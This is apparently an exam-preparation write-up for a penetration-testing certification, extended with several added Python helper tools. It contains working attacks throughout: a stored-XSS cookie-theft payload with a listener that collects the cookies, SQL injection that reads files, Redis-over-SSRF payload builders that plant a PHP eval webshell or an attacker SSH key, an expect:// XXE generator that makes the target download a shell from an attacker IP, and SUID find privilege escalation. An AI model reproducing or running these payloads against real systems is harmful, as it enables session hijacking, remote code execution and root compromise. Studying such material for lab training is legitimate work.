The PTS exam took less than half a month from registration to the test. If you have a foundation in practicing questions, it is quite easy to pass, because many of the questions are basically the same as the training materials. However, there are some questions that even the training institutions don't know. For example, in this exam the last major question had Nacos as the internal service, and Nacos has no exploit (exp). I tried common weak passwords but couldn't get in, so I did not attempt it. Most of the questions only had 2 keys (20 points), and if you made sure to get all the previous keys you would already have 80 points. As long as you have more than 70 points, you pass.
Let me talk about the questions I encountered in the exam.
Scenario 1
XSS + SQLi + file read, quite simple.
For the XSS, start a web listener on the attack machine with Python (for example python3 -m http.server 1234), then submit the payload. The vulnerability here is a stored XSS: the stored script runs in the administrator's browser and makes it request the listener with document.cookie in the query string, so the administrator's cookie shows up in the listener's access log. This only works if the session cookie is not marked HttpOnly. In the payload, ip is the attack machine's address.
<script>document.write('<img src="http://ip:1234/?cookie='+document.cookie+'" />')</script>
This gives you the administrator's cookie.
In the browser, right-click the page and choose Inspect, select the Application tab, find Storage - Cookies, and replace the PHPSESSID value with the administrator's cookie.
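The listener for the cookie-stealing step, as an added example that is not part of the original writeup: instead of reading cookies out of http.server's access log, this small server pulls the cookie query parameter out of every request and prints it. The port 1234 and the cookie parameter name match the page's payload; everything else (the 204 response, the in-memory list) is an assumption of this example.

```python
# Added example: cookie catcher for the stored-XSS payload
#   <img src="http://<attacker>:1234/?cookie=...">
# Not the writeup's code; port and parameter name follow the page's payload.
import http.server
import socketserver
from urllib.parse import urlparse, parse_qs

PORT = 1234
captured = []  # every cookie string received, in arrival order


def extract_cookie(path):
    """Return the value of the ?cookie= parameter in a request path, or None.

    document.cookie arrives as 'NAME=value; NAME2=value2'; parse_qs splits on
    the first '=' only, so the whole cookie string is kept intact.
    """
    values = parse_qs(urlparse(path).query).get("cookie")
    return values[0] if values else None


class CookieHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = extract_cookie(self.path)
        if cookie is not None:
            captured.append(cookie)
            print(f"[+] {self.client_address[0]} -> {cookie}")
        # 204 No Content: the victim page shows nothing for the <img>.
        self.send_response(204)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep stdout limited to captured cookies


def serve(port=PORT):
    """Block and serve until interrupted (run this on the attack machine)."""
    with socketserver.TCPServer(("", port), CookieHandler) as httpd:
        httpd.serve_forever()


if __name__ == "__main__":
    serve()
```

Start it before submitting the payload; once the administrator views the stored content, the PHPSESSID value printed here is the one to paste into the browser's cookie storage.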
SQLi payload (UNION-based: the /**/ comments stand in for spaces a filter would block, the mixed-case UniOn/SeLEct dodges a keyword filter, a non-existent id like 12312 makes the UNION row the one displayed, and column 3 is the one rendered on the page; load_file() only works if the database user has the FILE privilege and secure_file_priv permits reading /var):
http://ip:3603/admin/edit.php?id=12312/**/UniOn/**/SeLEct/**/1,2,load_file("/var/key2"),4#
Or let sqlmap read the file, passing the admin session cookie obtained above:
http://IP:3603/admin/edit.php?id=11 (GET)
# sqlmap.py -u http://10.52.0.29:3603/admin/edit.php?id=11 --cookie=PHPSESSID=732ece3c4dcdba588d48593d689bf927 --dbms mysql --file-read /var/key2
Arbitrary file read: the page parameter is used as a file path without restriction, so any file the web server can read can be pulled directly.
http://IP:3603/admin/setting.php?page=/tmp/key3
Scenario 2
SSRF + Redis getshell
SSRF: a directory scan turns up robots.txt, which points to backup.zip; unzip it to get a txt file that gives an internal web port. Entering http://localhost:1234 in the search box the challenge provides makes the server fetch that internal service, which returns the first key.
Redis getshell: Redis listens on localhost:6379 of the web host without authentication and is reachable through the same SSRF, so it can be driven with dict:// URLs. curl rewrites every ':' in a dict path as a space, so dict://localhost:6379/config:set:dir:/var/www/html/app1 reaches Redis as config set dir /var/www/html/app1. Two cautions: flushall wipes the existing database, which is fine in an exam but not on a real engagement, and if the SSRF entry point does not URL-encode what you type, percent-encode the PHP yourself, because the ? in <?php would otherwise be taken as the start of a query string and cut the command short.
Write the webshell:
dict://localhost:6379/flushall
dict://localhost:6379/set:1:'<?php eval($_POST[1]);?>'
dict://localhost:6379/config:set:dir:/var/www/html/app1
dict://localhost:6379/config:set:dbfilename:a.php
dict://localhost:6379/save
Write an SSH key: the same config set dir / dbfilename / save sequence, pointed at an authorized_keys file with your public key as the value.
That gives the second key; the third key is in the scheduled tasks (cron).
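A payload builder for the Redis-over-SSRF steps above (webshell and SSH key), as an added example that is not from the writeup. It produces the page's dict:// form and, because dict:// cannot carry ':' or newlines, the usual gopher:// alternative that sends the commands in Redis's own RESP framing. The host 127.0.0.1:6379, the webroot /var/www/html/app1, the file name a.php and the placeholder public key are assumptions; the SSRF entry point is assumed to hand the URL to curl.

```python
# Added example (not the writeup's code): build SSRF payloads for the
# unauthenticated-Redis write tricks described above.
from urllib.parse import quote


def resp_encode(args):
    """One Redis command as a RESP multi-bulk array (what redis-cli sends)."""
    out = f"*{len(args)}\r\n"
    for a in args:
        out += f"${len(a.encode())}\r\n{a}\r\n"
    return out


def gopher_url(commands, host="127.0.0.1", port=6379):
    """A single gopher:// URL that pushes every command in one TCP session.

    The '_' after the slash is a dummy gopher item type that curl strips; the
    rest of the path is percent-decoded and sent raw, so CR/LF survive.
    """
    body = "".join(resp_encode(c) for c in commands)
    return f"gopher://{host}:{port}/_" + quote(body, safe="")


def dict_urls(commands, host="127.0.0.1", port=6379):
    """The page's dict:// form, one URL per command.

    curl turns every ':' in the path into a space, so ':' can never be part
    of an argument, and Redis's inline protocol ends at a newline, so no
    CR/LF either. Arguments containing spaces are wrapped in single quotes,
    which the inline protocol accepts, and percent-encoded for the URL.
    """
    urls = []
    for c in commands:
        parts = []
        for a in c:
            if any(ch in a for ch in ":\r\n"):
                raise ValueError(f"{a!r} cannot be sent over dict://, use gopher")
            if " " in a:
                a = f"'{a}'"
            parts.append(quote(a, safe="/'"))
        urls.append(f"dict://{host}:{port}/" + ":".join(parts))
    return urls


def webshell_commands(webroot="/var/www/html/app1", name="a.php", pad=True):
    """flushall / set / config set dir / config set dbfilename / save.

    pad=True surrounds the PHP with newlines so it stays intact inside the
    binary RDB dump (gopher only); pad=False matches the page's dict:// form.
    """
    php = "<?php eval($_POST[1]);?>"
    value = f"\n\n{php}\n\n" if pad else php
    return [["flushall"],
            ["set", "1", value],
            ["config", "set", "dir", webroot],
            ["config", "set", "dbfilename", name],
            ["save"]]


def ssh_key_commands(pubkey, home="/root"):
    """Same sequence aimed at authorized_keys; pubkey is the attacker's key."""
    return [["flushall"],
            ["set", "k", f"\n\n{pubkey}\n\n"],
            ["config", "set", "dir", f"{home}/.ssh"],
            ["config", "set", "dbfilename", "authorized_keys"],
            ["save"]]


if __name__ == "__main__":
    for u in dict_urls(webshell_commands(pad=False)):
        print(u)
    print(gopher_url(webshell_commands()))
    # Placeholder key, assumed for the example; substitute your own.
    print(gopher_url(ssh_key_commands("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAA... attacker")))
```

Feed each printed URL to the SSRF parameter; the dict:// variant needs one request per command, the gopher:// variant one request in total.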
Scenario 3
An XXE vulnerability.
Write a webshell through the expect:// wrapper: PHP's expect stream wrapper (the PECL expect extension, not enabled by default, which is why this does not work on every target) executes the command in the URI, so an external entity can make the target run curl against a web server started on the attack machine and fetch the shell.
Execute a command (the output is echoed back inside the <p> element):
<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://id">]><p>&b;</p>
Write the shell. Spaces in the expect:// URI are replaced with $IFS$9: $IFS expands to the shell's field separator and $9 is an empty positional parameter that ends the variable name without needing a literal space. curl -O saves shell.php in the working directory of the PHP process, so that is where to look for it afterwards.
<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://curl$IFS$9-O$IFS$9'192.168.80.48:8088/shell.php'">]><p>&b;</p>
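The two XXE documents above, generated from a plain shell command, as an added example that is not part of the original writeup. It applies the $IFS$9 substitution, refuses a command that would break out of the quoted SYSTEM literal, and includes a helper to POST the result; the endpoint URL and the application/xml content type are assumptions.

```python
# Added example (not the writeup's code): build expect:// XXE payloads.
import urllib.request


def shell_safe(cmd):
    """Replace spaces with $IFS$9 so the command survives the URI.

    $IFS is the shell's field separator; $9 is an (empty) positional
    parameter that terminates the variable name without a literal space.
    """
    return cmd.replace(" ", "$IFS$9")


def xxe_expect(cmd):
    """External entity pointing at expect://<cmd>, referenced inside <p> so
    the command output is echoed back in the response."""
    safe = shell_safe(cmd)
    # The system identifier is a double-quoted literal; a '"' inside it
    # would end the literal early, so use single quotes in the command.
    if '"' in safe:
        raise ValueError("use single quotes inside the command, not double")
    return ('<?xml version="1.0"?>'
            f'<!DOCTYPE a[<!ENTITY b SYSTEM "expect://{safe}">]><p>&b;</p>')


def fetch_shell_payload(attacker, path="shell.php"):
    """Payload that makes the target curl -O our shell (page's second payload)."""
    return xxe_expect(f"curl -O '{attacker}/{path}'")


def send_xxe(url, payload, timeout=10):
    """POST the document as XML and return the response body (network)."""
    req = urllib.request.Request(
        url, data=payload.encode(), headers={"Content-Type": "application/xml"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    print(xxe_expect("id"))
    # Attacker host and port from the page; the target URL is assumed.
    print(fetch_shell_payload("192.168.80.48:8088"))
    # print(send_xxe("http://target/xml_endpoint", xxe_expect("id")))
```

If the response comes back without the command output, expect:// is most likely not installed on the target, and a different wrapper or a plain file:// read is the next thing to try.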
Privilege escalation: look for SUID binaries (confirm a hit with ls -l on the path; the s in the owner's execute position is the bit that matters).
find / -perm -u=s -type f 2>/dev/null
find is SUID root here, so whatever runs under -exec runs as root. The 1 is just an existing file for find to match (touch 1 first if needed), and the command reads root's home:
find 1 -exec ls /root \;
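The SUID hunt from the privilege escalation step as a script, as an added example that is not part of the original writeup: it walks the filesystem for regular files with the setuid bit and flags the ones whose normal function already includes running other commands, which is what made the SUID find usable above. The short list of such binaries is this example's own assumption, not something the page states.

```python
# Added example (not the writeup's code): enumerate SUID files and flag the
# ones that hand out command execution when SUID root.
import os
import stat

# Assumed shortlist; find is the one the exam box had.
DANGEROUS = {"find", "bash", "sh", "dash", "python", "python3", "perl",
             "vim", "vi", "nmap", "env", "awk", "gawk", "less", "more",
             "cp", "mv", "tee", "nano"}


def find_suid(root="/"):
    """Return sorted paths of regular files under root with the setuid bit.

    Equivalent to: find <root> -perm -u=s -type f 2>/dev/null
    Unreadable directories are skipped, and symlinks are not followed.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def flag_dangerous(paths):
    """Subset of paths whose basename is in the DANGEROUS list."""
    return [p for p in paths if os.path.basename(p) in DANGEROUS]


if __name__ == "__main__":
    suid = find_suid("/")
    for p in suid:
        marker = "  <-- exec" if p in flag_dangerous(suid) else ""
        print(f"{p}{marker}")
```

Run it as the low-privilege user you landed as; anything marked <-- exec is worth checking against the -exec style trick used with find above.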